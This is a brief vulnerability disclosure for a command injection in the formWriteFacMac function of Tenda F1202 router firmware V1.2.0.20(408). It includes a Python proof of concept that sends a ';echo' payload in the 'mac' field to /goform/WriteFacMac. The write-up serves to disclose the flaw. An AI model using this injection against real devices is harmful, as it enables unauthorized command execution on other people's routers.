- Firmware download website: https://www.tenda.com.cn/download/detail-2671.html
F1202 V1.2.0.20(408)
The Tenda F1202 V1.2.0.20(408) firmware, we discovered a command injection vulnerablility in formWriteFacMac function in the v2 parameter and the mac varable is directly passed to a doSystemCmd function, causing an arbitrary command execution. The user-provided mac can trigger this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/WriteFacMac"
payload = ";echo 'hello'"
data = {"mac": payload}
response = requests.post(url, data=data)
print(response.text)